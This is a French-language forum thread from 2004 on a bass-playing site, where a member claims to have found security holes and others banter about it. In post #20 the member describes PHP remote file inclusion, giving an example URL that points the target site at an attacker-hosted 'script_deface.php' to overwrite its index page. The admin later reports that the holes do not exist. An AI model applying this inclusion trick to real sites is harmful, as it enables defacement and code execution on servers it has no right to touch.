ConnexionConnexionInscription
B E A D G
455 connectés Aller à Sweepyto Guitare

2 grosses failles, mais que fait l'admin ??? lol

#1
03/08/2004 21:58:23
bon je savais pas trop ou poster ce msg, dans divers ou problemes techniques mais tt le monde s'en fout je m'explique :
en tant que bassiste débutant je vien souvent ici (d'ailleur bravo pour les cours ils sont super) mais en me baladant j'ai trouvé PAR HASARD (c ca le + fort) 2 grosses failles que n'importe quel lame aurait pu exploiter pour faire un déface de ce site, snif, alors bon si l'admin le souhaite je pourrai lui expliquer quel sont ces failles pour qu'il arrange ca.

winston
acidzero@altern.org
0
0
#2
03/08/2004 22:03:44
lol ca sent l'include la dedans...
0
0
#3
03/08/2004 22:22:39
on peut aussi essayer les trucs vraiment à la con que tout le monde peut trouver ça peut être éventuellement marrant...
<font color=red>A voir</font>...
0
0
#4
03/08/2004 22:22:57
0
0
#5
03/08/2004 23:05:34
J'ai rien compri a tout les messages la
quelqu'un peut'il m'expliquer ?
0
0
#6
03/08/2004 23:56:04
0
0
#7
04/08/2004 00:27:19
plize
0
0
#8
04/08/2004 00:27:43
héhéhéhé apparament, le petit il a protégé son site contre les attaques intempestives de chteuleumeuleu???
0
0
#9
04/08/2004 00:29:41

J'ai demander des explication et jme retrouve avec ça:

8

Je fait quoi moi ?
0
0
#10
04/08/2004 00:35:10
3

C'est du langage HTML (ou chteuleumeuleu pour les intimes)
Ca te permet d'interagir sur la page : écrire en gros, en gras, en couleur etc.....

Les icônes HTML que tu peux voir à gauche sont une facilité offertes par le ouebmaster (merci poppyto) pour que tu n'ais pas à te taper les codes à écrire.

Vala vala
0
0
#11
04/08/2004 00:38:50
Oui et ?
0
0
#12
04/08/2004 01:01:54
Et c'est tout! le reste, c'est des trucs d'agents secrets, c'est codé pour qu'on comprenne pas
0
0
#13
04/08/2004 01:09:34
non mais a mon avis y'a des failles php dans le site, j'ai pas encore scanné mais winston l'afait, et par exeample la faille php la plus connue (include) peut etre tres dangereuse pour un site.
0
0
#14
04/08/2004 03:54:50
genre ça [color=red]çava[/color]
0
0
#15
04/08/2004 03:55:26
ah merde c' est vrai
0
0
#16
04/08/2004 09:28:04
c vrai y'a de l'include et une autre tt aussi simple mais moins connue (quand je disait que c'était des failles tres tres simple )
0
0
#17
04/08/2004 17:03:14
0
0
#18
04/08/2004 17:43:41
grey hat l'ami winston ?
0
0
#19
04/08/2004 17:48:36
en bref ca fait quoi l'include (je viens de faire une nouvelle version de mon site tout en php, et je suis en train de le mettre en ligne - il y en a marre des restrictions de free a ce sujet d'ailleurs - donc si ca me concerne...)
0
0
#20
04/08/2004 19:43:20
l'include ca permet d'apeler une page extérieur au site dans le site en gros, imagine que tu fasse une page avec un code php pour écrire dans le fichier index.php. dans le site visé, sur la page qui appelle une auter page tu remplace dans la barre d'adresse comme par example :
http://www.site_cible.com/index.php.page=http://www.site.php/page1.php

par

http://www.site_cible.com/index.php.page=http://www.site_a_toi/script_deface.php

le site cible ouvrira la page script_deface et en executera le contenu, la page index.php du site cible sera alors modifié !

bon je suis pa tres clair mais c simple pourtant lol

Klastek tu as msn? on pourrai causer un peu

winston
0
0
#21
04/08/2004 22:07:07
ok je crois que j'ai pige...

enfin ce que je fais c'est que je vous file l'adresse du site, et des que j'ai finis mes galeres avec free, qui veut pas de mes seesion_start (pourtant c'est pas grand chose...), bah vous pourrez me dire...

http://www.sebkhachott.fr.st

0
0
#22
05/08/2004 11:50:53
Bon je profite de ce poste pour essayer un tout ti truc lol Y a rien de bien méchant
0
0
#23
05/08/2004 19:20:16
J'ai pris contact avec winslow, fausse alerte les failles n'existent pas, ce n'étaient que des suppositions.

Stef
0
0
#24
05/08/2004 21:03:35
Poppyto > info ou intox, c quoi c failles, on peut pirater le site lol
0
0
#25
05/08/2004 22:32:04
24

Ba justement les failles qu'il m'a énuméré ne marchent pas
0
0
#27
06/08/2004 19:36:11
Slappyto
0
0
#28
06/08/2004 19:53:26
toto

0
0
#29
06/08/2004 20:22:42
28
bah ouais on s'amuse comme on peu :p
0
0

En Live

Cell a commenté le topic [Sansamp ou Darkglass ?] de pk.grs il y a 1 semaine
Cell a commenté le topic [Le Topic du Freepost 7] de Vikie il y a 1 semaine
Cell a commenté le topic [La mort de Slappyto?] de kurt il y a 1 semaine